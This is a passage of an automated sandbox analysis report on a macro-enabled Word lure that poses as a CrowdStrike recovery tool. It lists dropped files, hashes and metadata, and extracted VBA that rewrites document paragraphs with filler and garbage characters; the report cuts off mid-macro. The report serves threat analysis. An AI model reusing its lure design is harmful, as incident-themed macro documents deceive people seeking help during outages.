Preview:	L..................F.... .......r.......r.....9>...!.......................A....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Xfn..user.8......QK.X.Xfn...&=....U...............A.l.b.u.s.....z.1......Xjn..Desktop.d......QK.X.Xjn..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.!....Xin .NEW_RE~1.DOC..........WG..WG..........................N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.i.n.d.o.w.s...d.o.c.m.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm.^.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	modified
Size (bytes):	167
Entropy (8bit):	4.781242661256441
Encrypted:	false
SSDEEP:	3:HgA5AgFis6NAb6SQomZuMigIubNJYCm4wAgFis6NAb6SQomZuMigIubNJYCv:HFTFipAb6WmZuMiYbNWJFipAb6WmZuM3
MD5:	87E4B3E63F6FD43B41CB6BC643DAA68C
SHA1:	624BF01A26B59C2888129E771AF3579FFF15934F
SHA-256:	A496015FB1BF4656E45CB323ADEFB73534FA599934A83E4EB8CDEC9751A98353
SHA-512:	22B0BEE3C94F3C2AF4664ECD0D151312E13F64EC960C1D7FE2736BE249762E255ABC1B9ED5CA88BCB13D5934BAFD1D723CC6ABF4F8559B4D0B8E3572F9AB2E9E
Malicious:	false
Preview:	[misc]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..[folders]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
MD5:	C4615A023DC40AFFAEAE6CF07410BB43
SHA1:	AAE1D68C4082CABF6AEA71C7981F32928CE01843
SHA-256:	103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
SHA-512:	CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
MD5:	C4615A023DC40AFFAEAE6CF07410BB43
SHA1:	AAE1D68C4082CABF6AEA71C7981F32928CE01843
SHA-256:	103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
SHA-512:	CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\Downloads\52476a0b-6f03-45bf-aedd-6e44c7981759.tmp

Download File

Process:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	25518
Entropy (8bit):	7.981260120775725
Encrypted:	false
SSDEEP:	768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
MD5:	9C4B364491E6AF11CC33DF28C33C4216
SHA1:	4A0F078995949E9FC29BCE9437EB902BB32D462B
SHA-256:	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
SHA-512:	AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
Malicious:	false
Preview:	PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........\|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....\|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..\|q..<..........._..F\|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b\|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JPI.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E....... ..C.@r....UO

C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Download File

Process:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	25518
Entropy (8bit):	7.981260120775725
Encrypted:	false
SSDEEP:	768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
MD5:	9C4B364491E6AF11CC33DF28C33C4216
SHA1:	4A0F078995949E9FC29BCE9437EB902BB32D462B
SHA-256:	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
SHA-512:	AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
Malicious:	true
Preview:	PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........\|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....\|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..\|q..<..........._..F\|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b\|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JPI.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E....... ..C.@r....UO

C:\Users\user\Downloads\Unconfirmed 830279.crdownload (copy)

Download File

Process:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	25518
Entropy (8bit):	7.981260120775725
Encrypted:	false
SSDEEP:	768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
MD5:	9C4B364491E6AF11CC33DF28C33C4216
SHA1:	4A0F078995949E9FC29BCE9437EB902BB32D462B
SHA-256:	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
SHA-512:	AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
Malicious:	false
Preview:	PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........\|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....\|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..\|q..<..........._..F\|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b\|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JPI.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E....... ..C.@r....UO

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	downloaded
Size (bytes):	25518
Entropy (8bit):	7.981260120775725
Encrypted:	false
SSDEEP:	768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
MD5:	9C4B364491E6AF11CC33DF28C33C4216
SHA1:	4A0F078995949E9FC29BCE9437EB902BB32D462B
SHA-256:	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
SHA-512:	AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
Malicious:	false
URL:	https://download.microsoft.com/download/8/e/1/8e189885-12fe-4ebe-895d-b2d5a08aae65/MsftRecoveryToolForCSv2.zip
Preview:	PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........\|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....\|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..\|q..<..........._..F\|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b\|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JPI.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E....... ..C.@r....UO

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.938940748289286
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96% Word Microsoft Office Open XML Format document (49504/1) 36.13% Word Microsoft Office Open XML Format document (27504/1) 20.07% ZIP compressed archive (8000/1) 5.84%
File name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
File size:	310'160 bytes
MD5:	dd2100dfa067caae416b885637adc4ef
SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
SHA512:	809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
SSDEEP:	6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
TLSH:	1664E12B7D13A023F52BD6349E903E6C72026111A3935374B9286B7FF26D14F9D8E54B
File Content Preview:	PK..........!..am.............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	65e6a3a3afbfb9af

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Author:	Le Nho Thanh
Template:	Normal.dotm
Last Saved By:	David
Revion Number:	3
Total Edit Time:	4
Create Time:	2024-07-19T10:29:00Z
Last Saved Time:	2024-07-22T09:13:00Z
Number of Pages:	9
Number of Words:	2526
Number of Characters:	14404
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	120
Number of Paragraphs:	33
Thumbnail Scaling Desired:	false
Company:	Microsoft
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 27601

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	27601
Data ASCII:	. . . . . . . . . t . . . . . . b . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . $ X . E - . B / . 8 [ . a i s . B e 2 . . . . . . . . . . . . . . . . . . . . Z . L Z . i F Z Z g 6 . . . . . . . . . . . . . . . . . . . . . . x . . . . Z . L Z . i F Z Z g 6 $ X . E - . B / . 8 [ . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . S " . . . . S . . . . . S " . . . . . < 2 . . . . . > " . . . . . < X . . . . . . . . . . . . . . . . . . L . . . .
Data Raw:	01 16 03 00 04 00 01 00 00 74 0b 00 00 e4 00 00 00 62 02 00 00 02 0c 00 00 10 0c 00 00 e0 5d 00 00 04 00 00 00 01 00 00 00 97 d9 f8 db 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 24 58 0c 45 2d c6 bb 42 af 2f 07 e1 38 5b 0b 81 c3 61 69 73 c0 cd b3 42 91 9f a4 ef 65 97 32 fe 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

' Sub ChangeText()
'     ActiveDocument.Words(19).Text = "The "
' End Sub

Sub DeleteText()
    ' Dim rngFirstParagraph As Range
    
    ' Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
    ' With rngFirstParagraph
    ' .Delete
    ' .InsertAfter Text:="New text"
    ' .InsertParagraphAfter
    ' End With

    Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
    With rngFirstParagraph
    .Delete
    .InsertAfter Text:="Fourth paragraph displayed " + Chr(34)
    .InsertParagraphAfter
    End With

    Set rngFirstParagraph = ActiveDocument.Paragraphs(5).Range
    With rngFirstParagraph
    .Delete
    .InsertAfter Text:="Fifth paragraph displayed"
    .InsertParagraphAfter
    End With

    Set rngFirstParagraph = ActiveDocument.Paragraphs(6).Range
    With rngFirstParagraph
    .Delete
    .InsertAfter Text:="Sixth paragraph displayed"
    .InsertParagraphAfter
    End With

    Set rngFirstParagraph = ActiveDocument.Paragraphs(7).Range
    With rngFirstParagraph
    .Delete
    .InsertAfter Text:="Seventh paragraph displayed"
    .InsertParagraphAfter
    End With

    For i = 1 To ActiveDocument.Paragraphs.Count
        ' ActiveDocument.Paragraphs(i).Style = wdStyleNormal
        Set myRange = ActiveDocument.Paragraphs(i).Range
        With myRange.Font
        ' .Bold = True
        .Name = "Times New Roman"
        .Size = 14
        End With
    Next i
End Sub

Sub ShowErrorText()
    Dim rngFirstParagraph As Range
    
    Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
    With rngFirstParagraph
    .Delete
    .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
    .InsertParagraphAfter

    .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
    .InsertParagraphAfter

    .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
    .InsertParagraphAfter

    .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + 